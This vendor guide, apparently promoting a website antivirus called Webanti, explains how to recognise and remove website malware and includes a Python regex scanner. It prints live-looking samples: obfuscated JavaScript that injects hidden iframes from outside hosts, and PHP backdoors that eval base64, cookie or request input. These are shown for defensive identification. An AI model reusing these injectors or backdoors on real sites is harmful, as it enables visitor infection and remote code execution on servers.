Malware on website - how to identify and remove

We have prepared this guide to make it easier for our clients to eliminate viruses from WordPress, Joomla, or other websites.

The basic question that needs to be answered is: what does the virus on the website look like?

For the purposes of this guide, let us divide viruses into two types:

- those in files executed on the client side (e.g. HTML, JS, CSS)

- and those in files executed on the server side (e.g. in PHP)

What does a basic virus executed on the client's side look like?

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(''+e(c)+'','g'),k[c])}}return p}('i 9(){a=6.h('b');7(!a){5 0=6.j('k');6.g.l(0);0.n='b';0.4.d='8';0.4.c='8';0.4.e='f';0.m='w://z.o.B/C.D?t=E'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai|showthread|php|72241732'.split('|'),0,{}))
</script>

<!-- . --><script>var ar="=2}Cd8 pvsyw:AlEeTcBNfb6u>1<,)h.r3'niao0 g;/{m["(t]";try{'qwe'.length(1);}catch(a){k=new Boolean().toString();date=new Date();};var ar2="f120,120,108,63,18,144,12,114,54,72,135,48,105,147,93,123,48,147,45,42,48,135,48,105,147,27,57,30,51,111,123,60,111,135,48,144,102,66,114,12,30,102,87,138,117,150,87,132,120,120,120,108,63,96,111,135,48,96,144,87,126,120,120,6,18,48,42,27,48,18,132,120,120,120,12,114,54,72,135,48,105,147,93,33,96,108,147,48,144,141,81,108,63,96,111,135,48,18,27,96,54,0,102,90,147,147,21,36,129,129,3,117,69,93,78,99,117,93,78,3,78,93,78,3,15,129,108,135,111,123,48,27,129,72,21,42,114,111,12,93,90,147,135,42,102,18,33,108,12,147,90,0,102,78,117,102,18,90,48,108,123,90,147,0,102,78,117,102,18,27,147,30,42,48,0,102,24,108,27,108,66,108,42,108,147,30,36,90,108,12,12,48,105,126,21,114,27,108,147,108,114,105,36,111,66,27,114,42,72,147,48,126,42,48,63,147,36,117,126,147,114,21,36,117,126,102,75,81,129,108,63,96,111,135,48,75,141,87,126,120,120,6,120,120,63,72,105,54,147,108,114,105,18,108,63,96,111,135,48,96,144,87,132,120,120,120,24,111,96,18,63,18,0,18,12,114,54,72,135,48,105,147,93,54,96,48,111,147,48,45,42,48,135,48,105,147,144,102,108,63,96,111,135,48,102,87,126,63,93,27,48,147,39,147,147,96,108,66,72,147,48,144,102,27,96,54,102,84,102,90,147,147,21,36,129,129,3,117,69,93,78,99,117,93,78,3,78,93,78,3,15,129,108,135,111,123,48,27,129,72,21,42,114,111,12,93,90,147,135,42,102,87,126,63,93,27,147,30,42,48,93,24,108,27,108,66,108,42,108,147,30,0,102,90,108,12,12,48,105,102,126,63,93,27,147,30,42,48,93,21,114,27,108,147,108,114,105,0,102,111,66,27,114,42,72,147,48,102,126,63,93,27,147,30,42,48,93,42,48,63,147,0,102,117,102,126,63,93,27,147,30,42,48,93,147,114,21,0,102,117,102,126,63,93,27,48,147,39,147,147,96,108,66,72,147,48,144,102,33,108,12,147,90,102,84,102,78,117,102,87,126,63,93,27,48,147,39,147,147,96,108,66,72,147,48,144,102,90,48,108,123,90,147,102,84,102,78,117,102,87,126,120,120,120,12,114,54,72,135,48,105,147,93,123,48,147,45,42,48,135,48,105,147,27,57,30,51,111,123,60,111,135,48,144,102,66,114,12,30,102,87,138,117,150,93,111,21,21,48,105,12,9,90,108,42,12,144,63,87,126,120,120,6]".replace(k.substr(0,1),'[');pau="rnev2010"[('afas','rep')+('rhrh','lace')](date[('adsaf','getF')+'ullY'+('qwtrqwt','ear')]()-1,('awgwag',"al"));e=Function("retu"+pau)();ar2=('gfhgffg',e(ar2));s="";for(i=0;i!=ar2.length;i++){s+=ar.substr(ar2[i]/3,1);}
e(s);</script><!-- . -->


<script>
var t="";
var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f766e62757974612e636f2e62652f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>


The three examples above are typical of what turns up in client-side files. If you find such a file, or the Webanti scanner flags it, delete the fragment of code that resembles a virus.

Viruses in client-side files aim to infect visitors to your website, redirect traffic to another location, or display adverts that earn money for someone else. These are the viruses Google detects most often and for which it blocks domains. We nonetheless consider them less dangerous than the ones contained in server-side files, which have far more scope to interfere with the server's operation and can in turn produce the effects of viruses activated on the client's side.

What does a basic virus executed on the server's side look like?

<?php eval(base64_decode( [long base64 string omitted] ));?>


<?php
$qfvut=$_COOKIE;
$mmz=$qfvut[uxhm];
if($mmz){
$cpf=$mmz($qfvut[hxlp]);$kgnb=$mmz($qfvut[qhmp]);$qgw=$cpf("",$kgnb);$qgw();
}
?>


<?php if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == '970a023a0983e5b4c9a2d3dd6adbd0b8')
&&isset($_REQUEST['php_code'])) { eval($_REQUEST['php_code']); exit(); } ?><?php
$_REQUEST[e] ? eval( base64_decode( $_REQUEST[e] ) ) : exit;
?>
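The samples above share a handful of tells: a packer wrapped in `eval(function(p,a,c,k,e,d)`, a long numeric array that is turned back into code, a hex string rebuilt with `String.fromCharCode(parseInt(..., 16))` and fed to `eval`, a hidden 1x1 iframe, `eval(base64_decode(...))`, function names taken from `$_COOKIE` and then called, and `eval` of request input gated by an MD5 check. The scanner below is an added example written for this guide, not Webanti's code or its detection logic; the signature names and the sample files are constructed for illustration (the iframe points at a reserved `.invalid` host, and the MD5 value is a placeholder). It also unwraps the hex-string layer so the hidden iframe in the third client-side sample can be matched after decoding.

```python
import re
from pathlib import Path
from typing import List

# Heuristic signatures modelled on the samples in this guide. The names are
# labels chosen for this example, not Webanti's detection names.
SIGNATURES = [
    # client-side (JavaScript) tells
    ("js_packer", re.compile(r"eval\(function\(p,a,c,k,e,[dr]\)")),
    ("js_long_numeric_array", re.compile(r"(?:\d{1,3}\s*,\s*){40,}")),
    ("js_hex_charcode_loop", re.compile(r"fromCharCode\(\s*parseInt\([^)]*,\s*16\s*\)")),
    ("js_eval_of_variable", re.compile(r"\beval\s*\(\s*[A-Za-z_$][\w$]*\s*\)")),
    ("hidden_iframe", re.compile(r"<iframe\b[^>]*\b(?:width|height)\s*=\s*[\"']?[01]\b", re.I)),
    # server-side (PHP) tells
    ("php_eval_base64", re.compile(r"\beval\s*\(\s*base64_decode\s*\(")),
    ("php_eval_of_request", re.compile(
        r"\beval\s*\(\s*(?:base64_decode\s*\(\s*)?\$_(?:REQUEST|GET|POST|COOKIE)\b")),
    ("php_input_alias", re.compile(r"\$\w+\s*=\s*\$_(?:REQUEST|GET|POST|COOKIE)\s*;")),
    ("php_variable_function_call", re.compile(r"\$\w+\s*\(\s*\$\w+\s*\[")),
    ("php_md5_gated_request", re.compile(
        r"md5\s*\(\s*\$_(?:REQUEST|GET|POST)\s*\[[^\]]*\]\s*\)\s*==")),
]

# A long double-quoted literal made only of hex digits (plus wrap whitespace)
# is the layer the third client-side sample hides its payload behind.
HEX_LITERAL = re.compile(r"\"([0-9a-fA-F\s]{16,})\"")


def decode_hex_literals(text: str) -> List[str]:
    """Return the decoded form of every long hex string literal in text."""
    layers = []
    for match in HEX_LITERAL.finditer(text):
        digits = re.sub(r"\s+", "", match.group(1))
        if len(digits) % 2:
            continue  # odd length cannot be byte-aligned hex
        layers.append(bytes.fromhex(digits).decode("utf-8", "replace"))
    return layers


def scan_text(text: str) -> List[str]:
    """Sorted names of every signature that fires on text or on a hex layer inside it."""
    hits = {name for name, rx in SIGNATURES if rx.search(text)}
    for layer in decode_hex_literals(text):
        hits |= {name for name, rx in SIGNATURES if rx.search(layer)}
    return sorted(hits)


def scan_file(path) -> List[str]:
    return scan_text(Path(path).read_text(encoding="utf-8", errors="replace"))


def scan_tree(root, suffixes=(".php", ".js", ".html", ".htm")) -> dict:
    """Map each flagged file under root to the signatures it triggered."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_file(path)
            if hits:
                report[str(path)] = hits
    return report


# Constructed samples shaped like the guide's examples (benign placeholder host,
# placeholder hash, no real payload) so each signature can be seen firing.
HIDDEN_IFRAME = ('document.write(\'<iframe src="http://malware.invalid/f.php" '
                 'width="1" height="1" frameborder="0"></iframe>\')')
JS_HEX_SAMPLE = ('var t="";var arr="' + HIDDEN_IFRAME.encode().hex() + '";'
                 'for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);')
JS_PACKER_SAMPLE = "eval(function(p,a,c,k,e,d){return p}('x',1,1,'y'.split('|'),0,{}))"
PHP_COOKIE_SAMPLE = ("<?php $a=$_COOKIE; $b=$a['f'];"
                     "if($b){$c=$b($a['x']);$d=$c('',$a['y']);$d();} ?>")
PHP_EVAL_SAMPLE = "<?php $_REQUEST['e'] ? eval(base64_decode($_REQUEST['e'])) : exit; ?>"
PHP_GATED_SAMPLE = ("<?php if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == "
                    "'00000000000000000000000000000000') && isset($_REQUEST['php_code'])) "
                    "{ eval($_REQUEST['php_code']); exit(); } ?>")
BENIGN_PHP = "<?php echo htmlspecialchars($_GET['q']); ?>"

if __name__ == "__main__":
    for label, sample in [("js-hex", JS_HEX_SAMPLE), ("js-packer", JS_PACKER_SAMPLE),
                          ("php-cookie", PHP_COOKIE_SAMPLE), ("php-eval", PHP_EVAL_SAMPLE),
                          ("php-gated", PHP_GATED_SAMPLE), ("benign", BENIGN_PHP)]:
        print(f"{label:11} {scan_text(sample)}")
```

These are heuristics, not proof: `js_long_numeric_array` and `php_variable_function_call` can fire on legitimate minified libraries or on frameworks that call functions through variables, so treat a hit as a place to look, as the guide says, rather than something to delete blindly. Run `scan_tree("/path/to/webroot")` to get a file-to-signatures map for a whole site.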


As you can see, some of them are extremely difficult to understand, or even to read, and small changes to the code can make them undetectable to antivirus programs. Because of these problems, and drawing on the experience our team has gained over the years, we created Webanti. Its main task is to detect even the most obfuscated portions of malicious code; Webanti copes with serious backdoors that an ordinary antivirus would struggle with.


Webanti is intended to indicate the places where the dangerous bits of code are. When the whole file is a virus, move it to quarantine. But when the fragment is embedded in a legitimate file such as index.php, the file must not be moved or you will break your page. First create a backup of the file, then remove the excerpt (or the whole file) in the editor and check that the page still works correctly. After completing these steps, simply run an on-demand scan to verify that the virus has been removed. When the infection is serious and you are unable to clean the site, we recommend that you contact our support.

Get free virus protection

As the saying goes – prevention is better than cure. This is also true for website security. Each year there are more and more cybercrimes committed by hackers, or by the software they create. Viruses/malware, ransomware, backdoors – the list of threats is long. Luckily, there are effective ways to prevent them. See how Webanti can take care of the security of your website.

Webanti is antivirus software which makes it possible to protect websites in real time and which informs the website owner about any attempted hacker attacks. Interested? You can test the Webanti tool for free. If necessary, you can use the assistance of our consultants – 24/7, all year round.

Trust our expertise and start protecting your website effectively – try Webanti